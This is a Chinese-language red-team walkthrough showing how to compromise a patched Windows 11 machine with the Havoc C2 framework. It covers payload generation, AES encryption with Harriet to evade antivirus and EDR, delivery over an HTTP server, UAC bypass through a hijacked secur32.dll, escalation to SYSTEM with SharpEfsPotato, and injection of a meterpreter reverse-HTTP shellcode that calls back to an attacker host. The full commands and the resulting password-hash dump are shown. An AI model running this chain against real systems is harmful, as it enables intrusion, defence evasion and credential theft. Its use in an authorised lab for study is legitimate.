Havoc C2 上线Windows 11

1、环境配置

Windows11 更新到最新补丁(文章编写时间：‎2023‎年‎8‎月‎)，安全软件打开

Kali更新：

apt update -y && apt upgrade -y

安装设置Havoc

//下载项目
cd /opt && git clone https://github.com/HavocFramework/Havoc.git
//安装依赖包
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev libspdlog-dev python3-dev libboost-all-dev mingw-w64 nasm

构建服务端：

cd /opt/Havoc/teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
make ts-build

启动服务端：

./havoc server --profile ./profiles/havoc.yaotl

构建客户端：

make client-build

启动客户端：

./havoc client

单击"新建配置文件"使用默认凭据登录："5spider：password1234"。

# 2、设置监听

点击View---Listeners

点击底部的Add

设置新的监听器

# 3、生成payload

点击Attack-->Payload

选择监听器，设置系统架构和格式，然后点击Generate

保存生成的Payload文件

# 4、使用Harriet框架处理Payload绕过 AV/EDR

git clone https://github.com/assume-breach/Home-Grown-Red-Team.git
cd Home-Grown-Red-Team/Harriet 
sudo bash setup.sh
bash Harriet.sh

选择第一个 Create FUD EXE

然后选择1. Fully-Automated AES Encryption (全自动AES加密)

设置Shellcode文件路径

输入生成的名字

Crypto 解决 pip install pycryptodome

将文件复制到一个新的目录

─$ ls
DLL.sh  EXE.sh  Harriet  Harriet.sh  README.md  setup.sh  win11.exe                                                                                        
┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet]
└─$ mkdir web    
                                                                                                  
┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet]
└─$ cp win11.exe web/

启动一个HTTP服务，方便Windows 11上访问和下载这个文件

└─$ cd web          
                                                                                                  
┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet/web]
└─$ python3 -m http.server 8080      
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

# 5、模拟上线

在windows 11下载文件，并运行

# 6、获得会话

右键选择Interact 打开C2命令行窗口

# 7、枚举

使用SharpUp脚本枚举提权向量。

git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git

通过dotnet命令在 Havoc 会话的内存中运行它。

dotnet inline-execute /home/kali/SharpUp.exe audit

命令完成后，我们看到该用户是本地管理员！如果我们能绕过UAC，就可以获得一个高权限完整的反向 shell。

# 8、使用 DLL 劫持绕过Win 11 UAC

使用HighBorn 脚本，生成恶意 DLL。在 HighBorn 目录中，打开 HighBorn.c 文件。

把可执行文件替换为我们自己的路径

在havoc中执行pwd获取文件路径

保存文件，然后编译它

sudo x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,-subsystem,windows  

需要使用HighBorn.exe bypass UAC ,在HighBorn目录中，我们可以使用基于Linux的C#编译器Mono-Complete编译它

sudo apt install mono-complete -y
mcs -out:HighBorn.exe HighBorn.cs

编译之前，修改 HighBorn.cs中的dll下载地址

在内存中运行 UAC Bypass

dotnet inline-execute /home/kali/HighBorn.exe

然后回收到一个新的shell

查看当前用户权限

现在我们有一个高完整性信标， 我们可以使用 SharpEfsPotato 工具来获取system权限.你必须在Visual Studio上编译SharpEfsPotato。这是 git 链接。https://github.com/bugch3ck/SharpEfsPotato.git

编译完成后，在Havoc C2 会话内存中执行，使用-p指定二进制文件的位置

dotnet inline-execute /home/kali/SharpEfsPotato.exe -p C:\Users\jack\Downloads\win11.exe

提权成功，获得一个system权限的shell

# 9、利用Metasploit进行后渗透

通过注入一个meterpreter会话，进行hash转储。

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=192.168.10.140 LPORT=7777 -f raw > /home/kali/output.bin

用Harriet处理payload

使用donut转为shellcode

git clone http://github.com/thewover/donut.git
cd donut
make
./donut -i ./msfpayload.exe

  [ Donut shellcode generator v1 (built Aug 19 2023 14:35:50)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "./msfpayload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : continue
  [ PE Headers    : overwrite
  [ Shellcode     : "loader.bin"
  [ Exit          : Thread
                                   
cp loader.bin ~/msf.bin  

启动msfconsole ，设置监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
smsf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http
payload => windows/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST  192.168.10.140
LHOST => 192.168.10.140
msf6 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Started HTTP reverse handler on http://192.168.10.140:7777

通过Havoc注入shellcode

shellcode inject x64 PID# /home/kali/msf.bin
shellcode inject x64 844 /home/kali/msf.bin

利用后渗透模块dump 用户hash

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN11-  192.168.10.140:7777 -> 192.16
                                     PC                            8.10.180:50480 (192.168.10.18
                                                                   0)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/hashdump 
msf6 post(windows/gather/hashdump) > set session 1
session => 1
msf6 post(windows/gather/hashdump) > exploit 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1043c5689d3d7d604d0209dbd3ad9ee8...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:15e6c614c133e20a3e62994373849dee:::
jack:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::


[*] Post module execution completed

参考文章：https://assume-breach.medium.com/home-grown-red-team-getting-system-on-windows-11-with-havoc-c2-cc4bb089d22